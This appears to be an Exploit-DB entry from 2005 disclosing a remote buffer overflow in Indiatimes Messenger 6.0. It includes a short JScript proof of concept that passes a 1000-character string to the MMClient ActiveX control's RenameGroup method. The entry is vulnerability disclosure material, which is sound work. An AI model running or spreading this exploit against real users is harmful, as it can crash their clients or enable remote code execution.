Indiatimes Messenger 6.0 - Remote Buffer Overflow Vulnerability



EDB-ID: 26216 CVE: 2005-2844 OSVDB-ID: 19108
Author: ViPeR Published: 2005-08-31 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
source: http://www.securityfocus.com/bid/14705/info

Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability.

A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application.

Indiatimes Messenger 6.0 is affected by this issue. 

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]